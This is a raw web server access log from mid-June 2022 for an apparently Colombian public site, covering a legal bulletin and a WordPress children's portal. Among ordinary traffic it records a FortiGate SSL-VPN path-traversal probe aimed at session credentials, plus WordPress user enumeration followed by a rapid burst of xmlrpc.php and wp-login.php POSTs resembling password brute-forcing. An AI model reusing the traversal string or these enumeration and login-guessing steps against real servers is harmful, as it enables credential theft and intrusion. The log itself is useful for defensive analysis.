172.22.2.4 - - [15/Jun/2022:02:48:09 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 60973
85.115.52.140 - - [15/Jun/2022:02:50:59 -0500] "GET /portaldeninos/wp-includes/js/jquery/ui/widget.min.js?ver=1.11.4 HTTP/1.1" 200 6908
85.115.52.140 - - [15/Jun/2022:02:50:59 -0500] "GET /portaldeninos/wp-content/plugins/gallery-videos/JS/modernizr.custom.js?ver=4.9.8 HTTP/1.1" 200 9019
85.115.52.140 - - [15/Jun/2022:02:50:59 -0500] "GET /portaldeninos/wp-includes/js/jquery/ui/core.min.js?ver=1.11.4 HTTP/1.1" 200 4000
85.115.52.140 - - [15/Jun/2022:02:50:59 -0500] "GET /portaldeninos/wp-includes/js/jquery/jquery-migrate.min.js?ver=1.4.1 HTTP/1.1" 200 10056
85.115.52.140 - - [15/Jun/2022:02:50:59 -0500] "GET /portaldeninos/wp-includes/js/jquery/ui/mouse.min.js?ver=1.11.4 HTTP/1.1" 200 3148
85.115.52.140 - - [15/Jun/2022:02:50:59 -0500] "GET /portaldeninos/wp-content/themes/betheme/js/menu.js?ver=20.9.6 HTTP/1.1" 200 2449
85.115.52.140 - - [15/Jun/2022:02:50:59 -0500] "GET /portaldeninos/wp-includes/js/jquery/ui/accordion.min.js?ver=1.11.4 HTTP/1.1" 200 8584
85.115.52.140 - - [15/Jun/2022:02:50:59 -0500] "GET /portaldeninos/wp-content/themes/betheme/assets/animations/animations.min.js?ver=20.9.6 HTTP/1.1" 200 1896
85.115.52.140 - - [15/Jun/2022:02:50:59 -0500] "GET /portaldeninos/wp-content/plugins/google-analytics-for-wordpress/assets/js/frontend-gtag.min.js?ver=8.5.0 HTTP/1.1" 200 11801
85.115.52.140 - - [15/Jun/2022:02:50:59 -0500] "GET /portaldeninos/wp-includes/js/jquery/ui/tabs.min.js?ver=1.11.4 HTTP/1.1" 200 12110
85.115.52.140 - - [15/Jun/2022:02:50:59 -0500] "GET /portaldeninos/wp-includes/js/jquery/ui/sortable.min.js?ver=1.11.4 HTTP/1.1" 200 24899
85.115.52.140 - - [15/Jun/2022:02:50:59 -0500] "GET /portaldeninos/wp-content/plugins/gallery-videos/JS/Total-Soft-Gallery-Video-Widget.js?ver=4.9.8 HTTP/1.1" 200 80264
85.115.52.140 - - [15/Jun/2022:02:50:59 -0500] "GET /portaldeninos/wp-content/themes/betheme/assets/jplayer/jplayer.min.js?ver=20.9.6 HTTP/1.1" 200 52702
85.115.52.140 - - [15/Jun/2022:02:50:59 -0500] "GET /portaldeninos/wp-includes/js/jquery/jquery.js?ver=1.12.4 HTTP/1.1" 200 97184
85.115.52.140 - - [15/Jun/2022:02:50:59 -0500] "GET /portaldeninos/wp-content/themes/betheme/js/plugins.js?ver=20.9.6 HTTP/1.1" 200 197151
66.249.66.85 - - [15/Jun/2022:02:53:51 -0500] "-" 408 -
216.245.221.92 - - [15/Jun/2022:02:54:27 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [15/Jun/2022:02:53:09 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [15/Jun/2022:02:53:59 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 58482
216.245.221.92 - - [15/Jun/2022:02:59:27 -0500] "HEAD / HTTP/1.1" 200 -
157.55.39.215 - - [15/Jun/2022:02:59:39 -0500] "GET /si-tienes-entre-14-y-25-anos-y-quieres-participar-inscribete-a-la-convocatoria-de-lideres-juveniles-para-la-cumbre-de-alcaldes-c40-2022.html HTTP/1.1" 200 1141
66.249.66.85 - - [15/Jun/2022:03:00:08 -0500] "-" 408 -
172.22.2.4 - - [15/Jun/2022:02:58:59 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
181.54.149.217 - - [15/Jun/2022:03:01:26 -0500] "GET /mesa/contrasena.pdf HTTP/1.1" 200 443199
172.22.2.4 - - [15/Jun/2022:02:59:49 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 58482
181.54.149.217 - - [15/Jun/2022:03:03:16 -0500] "GET /mesa/contrasena.pdf HTTP/1.1" 206 1
181.54.149.217 - - [15/Jun/2022:03:03:16 -0500] "GET /mesa/contrasena.pdf HTTP/1.1" 206 401131
181.54.149.217 - - [15/Jun/2022:03:03:16 -0500] "GET /mesa/contrasena.pdf HTTP/1.1" 206 1
181.54.149.217 - - [15/Jun/2022:03:03:16 -0500] "GET /mesa/contrasena.pdf HTTP/1.1" 206 401131
181.54.149.217 - - [15/Jun/2022:03:03:40 -0500] "GET /mesa/contrasena.pdf HTTP/1.1" 206 1
181.54.149.217 - - [15/Jun/2022:03:03:40 -0500] "GET /mesa/contrasena.pdf HTTP/1.1" 206 160558
181.54.149.217 - - [15/Jun/2022:03:03:41 -0500] "GET /mesa/contrasena.pdf HTTP/1.1" 206 1
181.54.149.217 - - [15/Jun/2022:03:03:42 -0500] "GET /mesa/contrasena.pdf HTTP/1.1" 206 160558
40.77.167.79 - - [15/Jun/2022:03:04:01 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202021/4884.pdf HTTP/1.1" 304 -
216.245.221.92 - - [15/Jun/2022:03:04:27 -0500] "HEAD / HTTP/1.1" 200 -
199.16.157.181 - - [15/Jun/2022:03:04:32 -0500] "GET /bogota-otorgara-beneficio-ambiental-para-transportadores-de-carga-liviana-a-gas.html HTTP/1.1" 200 896
199.16.157.181 - - [15/Jun/2022:03:04:32 -0500] "GET /images/carro-carga-movilidad-4-febrero.jpg HTTP/1.1" 200 46258
181.54.149.217 - - [15/Jun/2022:03:05:22 -0500] "GET /galeria/galeria/jquery.fancybox.js?v=2.1.5 HTTP/1.1" 200 48706
181.54.149.217 - - [15/Jun/2022:03:05:22 -0500] "GET /BLA/boletinlegal/js/jquery.scrollShow.js HTTP/1.1" 200 4586
181.54.149.217 - - [15/Jun/2022:03:05:22 -0500] "GET /galeria/galeria/jquery.fancybox.css?v=2.1.5 HTTP/1.1" 200 4895
66.249.66.85 - - [15/Jun/2022:03:05:57 -0500] "-" 408 -
172.22.2.4 - - [15/Jun/2022:03:04:49 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
207.46.13.81 - - [15/Jun/2022:03:06:47 -0500] "GET /images/PAC1.jpeg HTTP/1.1" 200 66191
172.22.2.4 - - [15/Jun/2022:03:05:39 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 58029
46.249.32.156 - - [15/Jun/2022:03:08:25 -0500] "GET / HTTP/1.1" 400 946
216.245.221.92 - - [15/Jun/2022:03:09:27 -0500] "HEAD / HTTP/1.1" 200 -
66.249.66.85 - - [15/Jun/2022:03:11:54 -0500] "-" 408 -
172.22.2.4 - - [15/Jun/2022:03:10:39 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [15/Jun/2022:03:11:29 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 58482
216.245.221.92 - - [15/Jun/2022:03:14:27 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [15/Jun/2022:03:15:48 -0500] "GET /BLA/boletinlegal/jurisprudencia/analisis/AnalisisT-606-15.docx HTTP/1.1" 200 26698
172.22.2.4 - - [15/Jun/2022:03:15:48 -0500] "GET /BLA/boletinlegal/apple-touch-icon-120x120-precomposed.png HTTP/1.1" 404 1140
172.22.2.4 - - [15/Jun/2022:03:15:48 -0500] "GET /BLA/boletinlegal/apple-touch-icon-120x120.png HTTP/1.1" 404 1140
172.22.2.4 - - [15/Jun/2022:03:15:48 -0500] "GET /BLA/boletinlegal/apple-touch-icon-precomposed.png HTTP/1.1" 404 1140
172.22.2.4 - - [15/Jun/2022:03:15:48 -0500] "GET /BLA/boletinlegal/apple-touch-icon.png HTTP/1.1" 404 1140
172.22.2.4 - - [15/Jun/2022:03:15:49 -0500] "GET /BLA/boletinlegal/favicon.ico HTTP/1.1" 404 1140
172.22.2.4 - - [15/Jun/2022:03:15:49 -0500] "GET /BLA/boletinlegal/apple-touch-icon-120x120-precomposed.png HTTP/1.1" 404 1140
172.22.2.4 - - [15/Jun/2022:03:15:49 -0500] "GET /BLA/boletinlegal/apple-touch-icon-120x120.png HTTP/1.1" 404 1140
172.22.2.4 - - [15/Jun/2022:03:15:49 -0500] "GET /BLA/boletinlegal/apple-touch-icon-precomposed.png HTTP/1.1" 404 1140
172.22.2.4 - - [15/Jun/2022:03:15:49 -0500] "GET /BLA/boletinlegal/apple-touch-icon.png HTTP/1.1" 404 1140
172.22.2.4 - - [15/Jun/2022:03:15:49 -0500] "GET /BLA/boletinlegal/favicon.ico HTTP/1.1" 404 1140
172.22.2.4 - - [15/Jun/2022:03:16:38 -0500] "GET /BLA/boletinlegal/remote/fgt_lang?lang=/../../../..//////////dev/cmdb/sslvpn_websession HTTP/1.1" 404 1018
172.22.2.4 - - [15/Jun/2022:03:17:49 -0500] "GET /BLA/boletinlegal/Directivas/2011/Directiva%20No.%203%20del%2027%20de%20Mayo%20de%202011.pdf HTTP/1.1" 200 910420
172.22.2.4 - - [15/Jun/2022:03:16:29 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [15/Jun/2022:03:17:20 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 59075
66.249.66.85 - - [15/Jun/2022:03:19:22 -0500] "-" 408 -
216.245.221.92 - - [15/Jun/2022:03:19:27 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [15/Jun/2022:03:21:15 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 45403
172.22.2.4 - - [15/Jun/2022:03:22:12 -0500] "GET /BLA/boletinlegal/jurisprudencia/analisis/AnalisisT-606-15.docx HTTP/1.1" 200 26698
172.22.2.4 - - [15/Jun/2022:03:22:13 -0500] "GET /BLA/boletinlegal/apple-touch-icon-120x120-precomposed.png HTTP/1.1" 404 1140
172.22.2.4 - - [15/Jun/2022:03:22:13 -0500] "GET /BLA/boletinlegal/apple-touch-icon-120x120.png HTTP/1.1" 404 1140
172.22.2.4 - - [15/Jun/2022:03:22:13 -0500] "GET /BLA/boletinlegal/apple-touch-icon-precomposed.png HTTP/1.1" 404 1140
172.22.2.4 - - [15/Jun/2022:03:22:13 -0500] "GET /BLA/boletinlegal/apple-touch-icon.png HTTP/1.1" 404 1140
172.22.2.4 - - [15/Jun/2022:03:22:13 -0500] "GET /BLA/boletinlegal/favicon.ico HTTP/1.1" 404 1140
172.22.2.4 - - [15/Jun/2022:03:22:13 -0500] "GET /BLA/boletinlegal/apple-touch-icon-120x120-precomposed.png HTTP/1.1" 404 1140
172.22.2.4 - - [15/Jun/2022:03:22:13 -0500] "GET /BLA/boletinlegal/apple-touch-icon-120x120.png HTTP/1.1" 404 1140
172.22.2.4 - - [15/Jun/2022:03:22:13 -0500] "GET /BLA/boletinlegal/apple-touch-icon-precomposed.png HTTP/1.1" 404 1140
172.22.2.4 - - [15/Jun/2022:03:22:13 -0500] "GET /BLA/boletinlegal/apple-touch-icon.png HTTP/1.1" 404 1140
172.22.2.4 - - [15/Jun/2022:03:22:13 -0500] "GET /BLA/boletinlegal/favicon.ico HTTP/1.1" 404 1140
40.77.167.79 - - [15/Jun/2022:03:22:32 -0500] "GET /Publicaciones/2022EE83652.pdf HTTP/1.1" 404 227
201.245.192.253 - - [15/Jun/2022:03:22:06 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 47547
172.22.2.4 - - [15/Jun/2022:03:22:19 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
216.245.221.92 - - [15/Jun/2022:03:24:27 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [15/Jun/2022:03:23:09 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 54933
66.249.66.85 - - [15/Jun/2022:03:25:05 -0500] "-" 408 -
172.22.2.4 - - [15/Jun/2022:03:24:01 -0500] "GET /BLA/boletinlegal/index.php HTTP/1.1" 200 58029
172.22.2.4 - - [15/Jun/2022:03:25:52 -0500] "GET /BLA/boletinlegal/style.css HTTP/1.1" 200 9406
172.22.2.4 - - [15/Jun/2022:03:25:53 -0500] "GET /BLA/boletinlegal/js/jquery.js HTTP/1.1" 200 57254
172.22.2.4 - - [15/Jun/2022:03:25:54 -0500] "GET /BLA/boletinlegal/js/jquery.scrollShow.js HTTP/1.1" 200 4586
172.22.2.4 - - [15/Jun/2022:03:25:58 -0500] "GET /BLA/boletinlegal/js/jquery.scrollTo-min.js HTTP/1.1" 200 1150
172.22.2.4 - - [15/Jun/2022:03:26:00 -0500] "GET /BLA/boletinlegal/styles2.css HTTP/1.1" 200 1838
216.245.221.92 - - [15/Jun/2022:03:29:27 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [15/Jun/2022:03:28:09 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [15/Jun/2022:03:28:59 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 58482
201.245.192.253 - - [15/Jun/2022:03:31:15 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 45403
201.245.192.253 - - [15/Jun/2022:03:32:05 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 47547
66.249.66.85 - - [15/Jun/2022:03:33:41 -0500] "-" 408 -
156.96.154.202 - - [15/Jun/2022:03:33:31 -0500] "GET /portaldeninos/ HTTP/1.1" 200 109662
156.96.154.202 - - [15/Jun/2022:03:33:56 -0500] "GET /portaldeninos//wp-includes/wlwmanifest.xml HTTP/1.1" 200 1045
216.245.221.92 - - [15/Jun/2022:03:34:27 -0500] "HEAD / HTTP/1.1" 200 -
156.96.154.202 - - [15/Jun/2022:03:34:11 -0500] "GET /portaldeninos//wp-login.php HTTP/1.1" 200 2592
172.22.2.4 - - [15/Jun/2022:03:33:42 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 36811
156.96.154.202 - - [15/Jun/2022:03:34:28 -0500] "GET /portaldeninos//?author=1 HTTP/1.1" 301 -
156.96.154.202 - - [15/Jun/2022:03:34:45 -0500] "GET /portaldeninos//?author=2 HTTP/1.1" 301 -
172.22.2.4 - - [15/Jun/2022:03:33:59 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
156.96.154.202 - - [15/Jun/2022:03:36:17 -0500] "GET /portaldeninos//wp-json/wp/v2/users/ HTTP/1.1" 200 1366
156.96.154.202 - - [15/Jun/2022:03:36:19 -0500] "POST /portaldeninos//xmlrpc.php HTTP/1.1" 200 413
156.96.154.202 - - [15/Jun/2022:03:36:20 -0500] "POST /portaldeninos//xmlrpc.php HTTP/1.1" 200 413
156.96.154.202 - - [15/Jun/2022:03:36:21 -0500] "POST /portaldeninos//xmlrpc.php HTTP/1.1" 200 413
156.96.154.202 - - [15/Jun/2022:03:36:21 -0500] "POST /portaldeninos//xmlrpc.php HTTP/1.1" 200 413
156.96.154.202 - - [15/Jun/2022:03:36:22 -0500] "POST /portaldeninos//xmlrpc.php HTTP/1.1" 200 413
156.96.154.202 - - [15/Jun/2022:03:36:22 -0500] "POST /portaldeninos//xmlrpc.php HTTP/1.1" 200 413
156.96.154.202 - - [15/Jun/2022:03:36:23 -0500] "POST /portaldeninos//xmlrpc.php HTTP/1.1" 200 413
156.96.154.202 - - [15/Jun/2022:03:36:23 -0500] "POST /portaldeninos//xmlrpc.php HTTP/1.1" 200 413
156.96.154.202 - - [15/Jun/2022:03:36:24 -0500] "POST /portaldeninos//xmlrpc.php HTTP/1.1" 200 413
156.96.154.202 - - [15/Jun/2022:03:36:24 -0500] "POST /portaldeninos//xmlrpc.php HTTP/1.1" 200 413
156.96.154.202 - - [15/Jun/2022:03:36:25 -0500] "POST /portaldeninos//xmlrpc.php HTTP/1.1" 200 413
156.96.154.202 - - [15/Jun/2022:03:36:25 -0500] "POST /portaldeninos//xmlrpc.php HTTP/1.1" 200 413
156.96.154.202 - - [15/Jun/2022:03:36:26 -0500] "POST /portaldeninos//xmlrpc.php HTTP/1.1" 200 413
156.96.154.202 - - [15/Jun/2022:03:36:26 -0500] "POST /portaldeninos//xmlrpc.php HTTP/1.1" 200 413
156.96.154.202 - - [15/Jun/2022:03:36:27 -0500] "POST /portaldeninos//xmlrpc.php HTTP/1.1" 200 413
156.96.154.202 - - [15/Jun/2022:03:36:27 -0500] "POST /portaldeninos//xmlrpc.php HTTP/1.1" 200 413
172.22.2.4 - - [15/Jun/2022:03:34:49 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 58482
156.96.154.202 - - [15/Jun/2022:03:36:32 -0500] "POST /portaldeninos//xmlrpc.php HTTP/1.1" 200 413
156.96.154.202 - - [15/Jun/2022:03:36:32 -0500] "POST /portaldeninos//xmlrpc.php HTTP/1.1" 200 413
156.96.154.202 - - [15/Jun/2022:03:36:33 -0500] "POST /portaldeninos//xmlrpc.php HTTP/1.1" 200 413
156.96.154.202 - - [15/Jun/2022:03:36:33 -0500] "POST /portaldeninos//xmlrpc.php HTTP/1.1" 200 413
156.96.154.202 - - [15/Jun/2022:03:36:34 -0500] "POST /portaldeninos//xmlrpc.php HTTP/1.1" 200 413
156.96.154.202 - - [15/Jun/2022:03:36:34 -0500] "POST /portaldeninos//xmlrpc.php HTTP/1.1" 200 413
156.96.154.202 - - [15/Jun/2022:03:36:35 -0500] "POST /portaldeninos//xmlrpc.php HTTP/1.1" 200 413
156.96.154.202 - - [15/Jun/2022:03:36:36 -0500] "POST /portaldeninos//xmlrpc.php HTTP/1.1" 200 413
156.96.154.202 - - [15/Jun/2022:03:36:36 -0500] "POST /portaldeninos//xmlrpc.php HTTP/1.1" 200 413
156.96.154.202 - - [15/Jun/2022:03:36:39 -0500] "POST /portaldeninos//xmlrpc.php HTTP/1.1" 200 413
156.96.154.202 - - [15/Jun/2022:03:36:41 -0500] "POST /portaldeninos//xmlrpc.php HTTP/1.1" 200 413
156.96.154.202 - - [15/Jun/2022:03:36:42 -0500] "POST /portaldeninos//xmlrpc.php HTTP/1.1" 200 413
156.96.154.202 - - [15/Jun/2022:03:36:42 -0500] "POST /portaldeninos//xmlrpc.php HTTP/1.1" 200 413
156.96.154.202 - - [15/Jun/2022:03:36:43 -0500] "POST /portaldeninos//xmlrpc.php HTTP/1.1" 200 413
156.96.154.202 - - [15/Jun/2022:03:36:43 -0500] "POST /portaldeninos//xmlrpc.php HTTP/1.1" 200 413
156.96.154.202 - - [15/Jun/2022:03:36:44 -0500] "POST /portaldeninos//xmlrpc.php HTTP/1.1" 200 413
156.96.154.202 - - [15/Jun/2022:03:36:44 -0500] "POST /portaldeninos//xmlrpc.php HTTP/1.1" 200 413
156.96.154.202 - - [15/Jun/2022:03:36:45 -0500] "POST /portaldeninos//xmlrpc.php HTTP/1.1" 200 413
156.96.154.202 - - [15/Jun/2022:03:36:46 -0500] "POST /portaldeninos//xmlrpc.php HTTP/1.1" 200 413
156.96.154.202 - - [15/Jun/2022:03:36:48 -0500] "POST /portaldeninos//xmlrpc.php HTTP/1.1" 200 413
156.96.154.202 - - [15/Jun/2022:03:36:48 -0500] "POST /portaldeninos//xmlrpc.php HTTP/1.1" 200 413
156.96.154.202 - - [15/Jun/2022:03:36:51 -0500] "POST /portaldeninos//xmlrpc.php HTTP/1.1" 200 413
156.96.154.202 - - [15/Jun/2022:03:36:51 -0500] "POST /portaldeninos//xmlrpc.php HTTP/1.1" 200 413
156.96.154.202 - - [15/Jun/2022:03:36:52 -0500] "POST /portaldeninos//xmlrpc.php HTTP/1.1" 200 413
156.96.154.202 - - [15/Jun/2022:03:36:52 -0500] "POST /portaldeninos//xmlrpc.php HTTP/1.1" 200 413
156.96.154.202 - - [15/Jun/2022:03:36:53 -0500] "POST /portaldeninos//xmlrpc.php HTTP/1.1" 200 413
156.96.154.202 - - [15/Jun/2022:03:36:53 -0500] "POST /portaldeninos//xmlrpc.php HTTP/1.1" 200 413
156.96.154.202 - - [15/Jun/2022:03:36:54 -0500] "POST /portaldeninos//xmlrpc.php HTTP/1.1" 200 413
156.96.154.202 - - [15/Jun/2022:03:36:55 -0500] "POST /portaldeninos//xmlrpc.php HTTP/1.1" 200 413
156.96.154.202 - - [15/Jun/2022:03:36:57 -0500] "POST /portaldeninos//xmlrpc.php HTTP/1.1" 200 413
156.96.154.202 - - [15/Jun/2022:03:36:57 -0500] "POST /portaldeninos//xmlrpc.php HTTP/1.1" 200 413
156.96.154.202 - - [15/Jun/2022:03:36:58 -0500] "POST /portaldeninos//xmlrpc.php HTTP/1.1" 200 413
156.96.154.202 - - [15/Jun/2022:03:36:58 -0500] "POST /portaldeninos//xmlrpc.php HTTP/1.1" 200 413
156.96.154.202 - - [15/Jun/2022:03:36:59 -0500] "POST /portaldeninos//xmlrpc.php HTTP/1.1" 200 413
156.96.154.202 - - [15/Jun/2022:03:36:59 -0500] "POST /portaldeninos//xmlrpc.php HTTP/1.1" 200 413
156.96.154.202 - - [15/Jun/2022:03:37:00 -0500] "POST /portaldeninos//xmlrpc.php HTTP/1.1" 200 413
156.96.154.202 - - [15/Jun/2022:03:37:04 -0500] "POST /portaldeninos//xmlrpc.php HTTP/1.1" 200 413
156.96.154.202 - - [15/Jun/2022:03:37:57 -0500] "POST /portaldeninos//xmlrpc.php HTTP/1.1" 200 413
156.96.154.202 - - [15/Jun/2022:03:38:02 -0500] "POST /portaldeninos//xmlrpc.php HTTP/1.1" 200 413
156.96.154.202 - - [15/Jun/2022:03:38:06 -0500] "POST /portaldeninos//xmlrpc.php HTTP/1.1" 200 413
172.22.2.4 - - [15/Jun/2022:03:38:24 -0500] "GET /BLA/boletinlegal/favicon.ico HTTP/1.1" 404 1038
156.96.154.202 - - [15/Jun/2022:03:38:30 -0500] "POST /portaldeninos//xmlrpc.php HTTP/1.1" 200 413
156.96.154.202 - - [15/Jun/2022:03:38:38 -0500] "POST /portaldeninos//xmlrpc.php HTTP/1.1" 200 413
156.96.154.202 - - [15/Jun/2022:03:38:40 -0500] "POST /portaldeninos//xmlrpc.php HTTP/1.1" 200 413
156.96.154.202 - - [15/Jun/2022:03:38:41 -0500] "POST /portaldeninos//xmlrpc.php HTTP/1.1" 200 413
156.96.154.202 - - [15/Jun/2022:03:38:41 -0500] "POST /portaldeninos//xmlrpc.php HTTP/1.1" 200 413
156.96.154.202 - - [15/Jun/2022:03:38:42 -0500] "POST /portaldeninos//xmlrpc.php HTTP/1.1" 200 413
156.96.154.202 - - [15/Jun/2022:03:38:42 -0500] "POST /portaldeninos//xmlrpc.php HTTP/1.1" 200 413
156.96.154.202 - - [15/Jun/2022:03:38:43 -0500] "POST /portaldeninos//xmlrpc.php HTTP/1.1" 200 413
156.96.154.202 - - [15/Jun/2022:03:38:44 -0500] "POST /portaldeninos//xmlrpc.php HTTP/1.1" 200 413
156.96.154.202 - - [15/Jun/2022:03:38:44 -0500] "POST /portaldeninos//xmlrpc.php HTTP/1.1" 200 413
156.96.154.202 - - [15/Jun/2022:03:38:45 -0500] "POST /portaldeninos//xmlrpc.php HTTP/1.1" 200 413
156.96.154.202 - - [15/Jun/2022:03:38:45 -0500] "POST /portaldeninos//xmlrpc.php HTTP/1.1" 200 413
156.96.154.202 - - [15/Jun/2022:03:38:47 -0500] "POST /portaldeninos//xmlrpc.php HTTP/1.1" 200 413
156.96.154.202 - - [15/Jun/2022:03:38:48 -0500] "POST /portaldeninos//xmlrpc.php HTTP/1.1" 200 413
156.96.154.202 - - [15/Jun/2022:03:38:48 -0500] "POST /portaldeninos//xmlrpc.php HTTP/1.1" 200 413
156.96.154.202 - - [15/Jun/2022:03:38:49 -0500] "POST /portaldeninos//xmlrpc.php HTTP/1.1" 200 413
156.96.154.202 - - [15/Jun/2022:03:38:49 -0500] "POST /portaldeninos//xmlrpc.php HTTP/1.1" 200 413
156.96.154.202 - - [15/Jun/2022:03:38:50 -0500] "POST /portaldeninos//xmlrpc.php HTTP/1.1" 200 413
156.96.154.202 - - [15/Jun/2022:03:38:50 -0500] "POST /portaldeninos//xmlrpc.php HTTP/1.1" 200 413
156.96.154.202 - - [15/Jun/2022:03:38:54 -0500] "POST /portaldeninos//xmlrpc.php HTTP/1.1" 200 413
156.96.154.202 - - [15/Jun/2022:03:38:55 -0500] "POST /portaldeninos//xmlrpc.php HTTP/1.1" 200 413
156.96.154.202 - - [15/Jun/2022:03:38:55 -0500] "POST /portaldeninos//xmlrpc.php HTTP/1.1" 200 413
156.96.154.202 - - [15/Jun/2022:03:38:56 -0500] "POST /portaldeninos//xmlrpc.php HTTP/1.1" 200 413
156.96.154.202 - - [15/Jun/2022:03:38:56 -0500] "POST /portaldeninos//xmlrpc.php HTTP/1.1" 200 413
156.96.154.202 - - [15/Jun/2022:03:38:57 -0500] "POST /portaldeninos//xmlrpc.php HTTP/1.1" 200 413
156.96.154.202 - - [15/Jun/2022:03:38:57 -0500] "POST /portaldeninos//xmlrpc.php HTTP/1.1" 200 413
156.96.154.202 - - [15/Jun/2022:03:38:58 -0500] "POST /portaldeninos//xmlrpc.php HTTP/1.1" 200 413
156.96.154.202 - - [15/Jun/2022:03:38:58 -0500] "POST /portaldeninos//xmlrpc.php HTTP/1.1" 200 413
156.96.154.202 - - [15/Jun/2022:03:38:59 -0500] "POST /portaldeninos//xmlrpc.php HTTP/1.1" 200 413
156.96.154.202 - - [15/Jun/2022:03:39:00 -0500] "POST /portaldeninos//xmlrpc.php HTTP/1.1" 200 413
156.96.154.202 - - [15/Jun/2022:03:39:00 -0500] "POST /portaldeninos//xmlrpc.php HTTP/1.1" 200 413
156.96.154.202 - - [15/Jun/2022:03:39:01 -0500] "POST /portaldeninos//xmlrpc.php HTTP/1.1" 200 413
156.96.154.202 - - [15/Jun/2022:03:39:01 -0500] "POST /portaldeninos//xmlrpc.php HTTP/1.1" 200 413
156.96.154.202 - - [15/Jun/2022:03:39:01 -0500] "POST /portaldeninos//xmlrpc.php HTTP/1.1" 200 413
156.96.154.202 - - [15/Jun/2022:03:39:02 -0500] "POST /portaldeninos//xmlrpc.php HTTP/1.1" 200 413
156.96.154.202 - - [15/Jun/2022:03:39:03 -0500] "POST /portaldeninos//xmlrpc.php HTTP/1.1" 200 413
156.96.154.202 - - [15/Jun/2022:03:39:03 -0500] "POST /portaldeninos//xmlrpc.php HTTP/1.1" 200 413
156.96.154.202 - - [15/Jun/2022:03:39:05 -0500] "POST /portaldeninos//xmlrpc.php HTTP/1.1" 200 413
156.96.154.202 - - [15/Jun/2022:03:39:06 -0500] "POST /portaldeninos//xmlrpc.php HTTP/1.1" 200 413
156.96.154.202 - - [15/Jun/2022:03:39:08 -0500] "POST /portaldeninos//xmlrpc.php HTTP/1.1" 200 413
156.96.154.202 - - [15/Jun/2022:03:39:09 -0500] "POST /portaldeninos//xmlrpc.php HTTP/1.1" 200 413
156.96.154.202 - - [15/Jun/2022:03:39:09 -0500] "POST /portaldeninos//xmlrpc.php HTTP/1.1" 200 413
156.96.154.202 - - [15/Jun/2022:03:39:10 -0500] "POST /portaldeninos//xmlrpc.php HTTP/1.1" 200 413
156.96.154.202 - - [15/Jun/2022:03:39:10 -0500] "POST /portaldeninos//xmlrpc.php HTTP/1.1" 200 413
156.96.154.202 - - [15/Jun/2022:03:39:11 -0500] "POST /portaldeninos//xmlrpc.php HTTP/1.1" 200 413
156.96.154.202 - - [15/Jun/2022:03:39:14 -0500] "POST /portaldeninos//xmlrpc.php HTTP/1.1" 200 413
156.96.154.202 - - [15/Jun/2022:03:39:14 -0500] "POST /portaldeninos//xmlrpc.php HTTP/1.1" 200 413
156.96.154.202 - - [15/Jun/2022:03:39:15 -0500] "POST /portaldeninos//xmlrpc.php HTTP/1.1" 200 413
156.96.154.202 - - [15/Jun/2022:03:39:15 -0500] "POST /portaldeninos//xmlrpc.php HTTP/1.1" 200 413
156.96.154.202 - - [15/Jun/2022:03:39:16 -0500] "POST /portaldeninos//xmlrpc.php HTTP/1.1" 200 413
156.96.154.202 - - [15/Jun/2022:03:39:18 -0500] "POST /portaldeninos//xmlrpc.php HTTP/1.1" 200 413
156.96.154.202 - - [15/Jun/2022:03:39:19 -0500] "POST /portaldeninos//xmlrpc.php HTTP/1.1" 200 413
156.96.154.202 - - [15/Jun/2022:03:39:19 -0500] "POST /portaldeninos//xmlrpc.php HTTP/1.1" 200 413
156.96.154.202 - - [15/Jun/2022:03:39:22 -0500] "POST /portaldeninos//xmlrpc.php HTTP/1.1" 200 413
156.96.154.202 - - [15/Jun/2022:03:39:22 -0500] "POST /portaldeninos//xmlrpc.php HTTP/1.1" 200 413
156.96.154.202 - - [15/Jun/2022:03:39:23 -0500] "POST /portaldeninos//xmlrpc.php HTTP/1.1" 200 413
156.96.154.202 - - [15/Jun/2022:03:39:24 -0500] "POST /portaldeninos//xmlrpc.php HTTP/1.1" 200 413
156.96.154.202 - - [15/Jun/2022:03:39:24 -0500] "POST /portaldeninos//xmlrpc.php HTTP/1.1" 200 413
156.96.154.202 - - [15/Jun/2022:03:39:25 -0500] "POST /portaldeninos//xmlrpc.php HTTP/1.1" 200 413
216.245.221.92 - - [15/Jun/2022:03:39:27 -0500] "HEAD / HTTP/1.1" 200 -
156.96.154.202 - - [15/Jun/2022:03:39:27 -0500] "POST /portaldeninos//xmlrpc.php HTTP/1.1" 200 413
156.96.154.202 - - [15/Jun/2022:03:39:28 -0500] "POST /portaldeninos//wp-login.php HTTP/1.1" 200 3588
156.96.154.202 - - [15/Jun/2022:03:39:28 -0500] "POST /portaldeninos//wp-login.php HTTP/1.1" 200 3588
156.96.154.202 - - [15/Jun/2022:03:39:29 -0500] "POST /portaldeninos//wp-login.php HTTP/1.1" 200 3588
